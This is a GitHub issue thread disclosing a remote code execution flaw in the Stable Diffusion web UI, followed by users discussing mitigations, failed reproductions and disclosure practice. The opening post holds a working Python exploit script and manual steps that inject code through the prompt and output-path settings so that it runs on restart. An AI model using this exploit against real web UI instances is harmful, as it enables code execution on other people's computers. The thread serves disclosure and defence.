AUTOMATIC1111/stable-diffusion-webui

Security: RCE danger in scripts.py


Description

Any file in the scripts folder is compiled and executed automatically, which can lead to remote code execution.

A simple exploit

import requests

url = 'your service url'
api = '/api/predict/'

true = True
false = False
null = None
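# note: the fn_index values used below are tied to commit 08b3f7a;
# they differ between webui/gradio versions, so this script is only a demo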

# create a hypernetwork named '''#
s = requests.Session()
r = s.post(url + api, json = {"fn_index":49,"data":["'''#",["768","320","640","1280"]],"session_hash":"9t0nm9ja8a6"})
print(r.text)

# use hypernetwork '''#
# check "Create a text file next to every image with generation parameters."
# redirect the images output dir to "./scripts"
data = {"fn_index":147,"data":[true,"png","",true,"png",false,true,-1,true,true,false,80,true,false,true,false,"scripts","outputs/txt2img-images","outputs/img2img-images","outputs/extras-images","","outputs/txt2img-grids","outputs/img2img-grids","log/images",false,false,false,"",8,192,8,["R-ESRGAN x4+","R-ESRGAN x4+ Anime6B"],192,8,100,null,null,0.5,false,8,false,true,false,""," ",100,null,"'''#",1,false,false,false,false,true,false,true,20,false,1,[],"sd_model_checkpoint",false,true,false,1,24,48,1500,0.5,true,false,true,true,0,true,false,true,false,"",true,true,true,[],0,1,"uniform",0,0,1,0],"session_hash":"9t0nm9ja8a6"}

r = s.post(url + api, json = data)
print(r.text)

# generate an image with an evil prompt
r = s.post(url + api, json = {"fn_index":13,"data":["import os; os.system(\"ls\"); open('exptest','w').write('gg');'''","","None","None",1,"Euler a",false,false,1,1,11,-1,-1,0,0,0,false,64,64,false,false,0.7,"None",false,false,null,"","Seed","","Nothing","",true,true,false,null,"",""],"session_hash":"3wyvvkx5xrb"})
print(r.text)

# restart gradio to load our scripts
r = s.post(url + api, json = {"fn_index":57,"session_hash":"d8pr218tdaw"})
print(r.text)

This exploit worked on commit 08b3f7a.


What the exploit did

  1. Go to the 'Train' tab, 'Create hypernetwork', enter '''# as the hypernetwork's name and create it.

  2. Go to the 'Settings' tab and check 'Create a text file next to every image with generation parameters.'

  3. Set 'Output directory for images; if empty, defaults to three directories below' to 'scripts'

  4. Switch the hypernetwork to '''# (the one we just created in step 1)

  5. Click 'Apply settings'

  6. Go to the 'txt2img' tab, enter any code you want to execute, ending with ''', then click 'Generate' (see the illustration after these steps)

  7. Go to the 'Settings' tab and click 'Restart Gradio and Refresh components (Custom Scripts, ui.py, js and css only)'
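
Why the last two steps give code execution: the webui writes a text file with the generation parameters next to every image, and because the output directory was redirected to 'scripts', that file lands in the scripts folder and is loaded like any other script on the Gradio restart. The written file looks roughly like this (illustrative only; the exact layout varies by version and settings):

import os; os.system("ls"); open('exptest','w').write('gg');'''
Negative prompt:
Steps: 11, Sampler: Euler a, ..., Hypernetwork: '''#, ...

The first line is executable Python. The trailing ''' opens a string literal that swallows the remaining parameter text, and the hypernetwork name '''# closes the string and comments out the rest of the line, so the whole file parses cleanly as Python when scripts.py loads it.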

Fix suggestions

Add a file extension check in the load_scripts function at https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/master/modules/scripts.py#L54
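
A rough sketch of that kind of check, assuming load_scripts walks the files in the scripts directory (the real signature and loading logic differ between revisions; this only illustrates skipping everything that is not a .py file):

import os

def load_scripts(basedir):
    for filename in sorted(os.listdir(basedir)):
        path = os.path.join(basedir, filename)
        # skip anything that is not a regular .py file, e.g. a generated
        # parameters .txt file that was written into the scripts folder
        if not os.path.isfile(path) or os.path.splitext(filename)[1].lower() != ".py":
            continue
        # ... existing compile/exec logic for a single script file ...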

Aren't those scripts supposed to execute on their own by design?
It's like downloading a DLL file, putting it into some graphic editor's "Plugins" folder (for example) and then wondering why those files get executed.

add file extension check

How would that solve the problem? Why would there be anything other than .py scripts there?
But checking the extension looks sane to me.


The problem is, if you share your webui on the Internet, I can execute arbitrary Python code on your computer. I don't need you to put anything in the scripts folder.

There is a setting that changes the image output directory. Changing it to "scripts" makes the webui automatically save the image and a prompt text file into the scripts folder.

In my example, I launched a clean webui just pulled from GitHub and executed the 'ls' command remotely.

BTW, changing the output folder to "javascripts" would lead to a DoS attack; there is a similar problem at https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/master/modules/ui.py#L1619

Hmm, are you able to put ANY custom path there, saving images to any folder on the target computer?

If so, that is a problem on its own now…

Rather than checking the extension of scripts/*, the issue seems to be that fn_index 147 can be given an arbitrary path, and the prompts can then be used to write text files there. Maybe adding authentication, or forcing a path prefix and sanitizing the input, would help?
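
A rough sketch of forcing a prefix and sanitizing the user-supplied directory (sanitize_output_dir, ALLOWED and BASE are made-up names for illustration, not code from this repo):

import os
import re

ALLOWED = re.compile(r'^[A-Za-z0-9 _\-./]+$')   # whitelist of path characters
BASE = os.path.abspath('outputs')               # forced prefix for image output

def sanitize_output_dir(user_path):
    if not ALLOWED.match(user_path):
        raise ValueError('illegal characters in output path')
    resolved = os.path.abspath(os.path.join(BASE, user_path))
    # reject anything that escapes the forced prefix, e.g. '../scripts'
    if os.path.commonpath([resolved, BASE]) != BASE:
        raise ValueError('output path escapes the allowed base directory')
    return resolved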

How about having a database of file hashes, editable only from localhost, with everything disabled by default until the user explicitly enables specific files?
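
Something along these lines, as a rough sketch (the allowlist file name and the hook into script loading are hypothetical):

import hashlib
import json
import os

def allowed_script_paths(scripts_dir, allowlist_path='script_hashes.json'):
    # only yield scripts whose SHA-256 appears in a locally maintained
    # allowlist; everything else stays disabled by default
    with open(allowlist_path) as f:
        allowed = set(json.load(f))
    for name in sorted(os.listdir(scripts_dir)):
        path = os.path.join(scripts_dir, name)
        if not os.path.isfile(path):
            continue
        with open(path, 'rb') as f:
            digest = hashlib.sha256(f.read()).hexdigest()
        if digest in allowed:
            yield path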

I don't think I'd trust just the suggestion of checking for a .py extension as anything other than an emergency stopgap measure. fn_index 147 (I can't match it up with anything in this repo, and I'm not familiar with Gradio) seems like a particular problem here. I highly suggest, if you don't generate the path yourself, whitelisting the allowable path characters (probably limit it to ASCII letters and digits).

It is indeed an emergency stopgap. I think the root problem is that the 'Settings' tab should not be accessible to unauthorized users, but I'm not familiar with Gradio either, so I don't know how to fix that.
fn_index 147 is actually the 'Apply settings' button; I have updated the exploit details in this issue.

The easy way out is to ask everyone to use --gradio-auth.
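
For example (placeholder credentials; the flag expects username:password and can go in COMMANDLINE_ARGS or directly on the command line):

python launch.py --share --gradio-auth someuser:a-long-random-password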

The exploit isn't working

{"error":null}
{"data":[false],"is_generating":false,"duration":0.0002467632293701172,"average_duration":0.00439375638961792}
{"error":null}
{"error":null}
Traceback (most recent call last):
  File "/usr/local/lib/python3.7/dist-packages/gradio/routes.py", line 276, in run_predict
    fn_index, raw_input, username, session_state, iterators
  File "/usr/local/lib/python3.7/dist-packages/gradio/blocks.py", line 784, in process_api
    inputs = self.preprocess_data(fn_index, inputs, state)
  File "/usr/local/lib/python3.7/dist-packages/gradio/blocks.py", line 679, in preprocess_data
    processed_input.append(block.preprocess(raw_input[i]))
  File "/usr/local/lib/python3.7/dist-packages/gradio/components.py", line 530, in preprocess
    return self._round_to_precision(x, self.precision)
  File "/usr/local/lib/python3.7/dist-packages/gradio/components.py", line 492, in _round_to_precision
    return float(num)
TypeError: float() argument must be a string or a number, not 'list'
Traceback (most recent call last):
  File "/usr/local/lib/python3.7/dist-packages/gradio/routes.py", line 276, in run_predict
    fn_index, raw_input, username, session_state, iterators
  File "/usr/local/lib/python3.7/dist-packages/gradio/blocks.py", line 784, in process_api
    inputs = self.preprocess_data(fn_index, inputs, state)
  File "/usr/local/lib/python3.7/dist-packages/gradio/blocks.py", line 679, in preprocess_data
    processed_input.append(block.preprocess(raw_input[i]))
  File "/usr/local/lib/python3.7/dist-packages/gradio/components.py", line 1096, in preprocess
    return self.choices.index(x)
ValueError: False is not in list
Traceback (most recent call last):
  File "/usr/local/lib/python3.7/dist-packages/gradio/routes.py", line 276, in run_predict
    fn_index, raw_input, username, session_state, iterators
  File "/usr/local/lib/python3.7/dist-packages/gradio/blocks.py", line 784, in process_api
    inputs = self.preprocess_data(fn_index, inputs, state)
  File "/usr/local/lib/python3.7/dist-packages/gradio/blocks.py", line 679, in preprocess_data
    processed_input.append(block.preprocess(raw_input[i]))
TypeError: 'NoneType' object is not subscriptable

Has this been fixed? I tried replicating the steps manually and nothing happened.

The exploit isn't working

{"error":null}
{"data":[false],"is_generating":false,"duration":0.0002467632293701172,"average_duration":0.00439375638961792}
{"error":null}
{"error":null}

This exploit is just a demo and only works at revision 08b3f7a, because the fn_index values differ between versions.

Has this been fixed? I tried replicating the steps manually and nothing happened.

Revision 36a0ba3 is still exploitable; I have tested it on Google Colab.

Following the manual steps in the webui does not yield any results on revision 36a0ba3

There is an easy fix that doesn't require changing any code.
Remove the write permission of the "scripts" folder in your OS.
In Windows, right-click the "scripts" folder and go to Properties. Switch to the Security tab and set the "Write" permission for the Administrators and Users accounts to "Deny". I've tested it; it works.
In Linux, use chmod to make the "scripts" folder read-only. For example:
sudo chmod 555 scripts
This sets the "scripts" folder to read and execute only. I haven't tested it.

Following the manual steps in the webui does not yield any results on revision 36a0ba3

Try turning off --gradio-debug if you enabled it. This option blocks the main thread, so the Gradio restart won't work.

The Gradio team seems to be attempting to get some fixes out for the security issues: gradio-app/gradio#2470

People are also reporting that individuals have been able to guess the Gradio links and start generating their own content.

There's also a Reddit thread about the issue: https://www.reddit.com/r/StableDiffusion/comments/y56qb9/security_warning_do_not_use_share_in/

It really is the responsibility of the application to ensure its users' safety, and that means taking into account the security implications of an easily guessable domain. It's good that Gradio is making instances more difficult to find; however, they bear no responsibility for the remote code execution vulnerability (that I'm aware of).

Has this even been addressed by project leaders here? Is Automatic aware of the situation?

23 days ago: #920
13 days ago: #1576

  • Is there any plan to notify users who might be affected by this?
  • Is there a plan in place to identify and quickly respond to vulnerabilities going forward?
  • Without a security policy in place, there is no channel for people to communicate and address security issues without posting a full disclosure, as @ihopenot has done.

@ihopenot Can you explain your perspective on posting the exploit publicly? Did you make any effort to address this through back channels? What were your initial points of reference that this was something to investigate?

An easy fix is just to use nginx proxies with auth and, for example, a hard-to-guess password like oralc**shot.

Has this been fixed? I tried replicating the steps manually and nothing happened.

Revision 36a0ba3 is still exploitable; I have tested it on Google Colab.

Any recommendations on actions for users to take in case they were exploited?


If you are running a public service, enabling hide_ui_dir_config should be fine (but it also restricts some features).
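
For example (assuming the command-line flag form of that option, together with --listen for a public instance):

python launch.py --listen --hide-ui-dir-config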

Bringing this back to the top once more... 9 months later, and given the steady increase in use of A1111, this issue is not getting smaller if it still persists unpatched or unmoderated.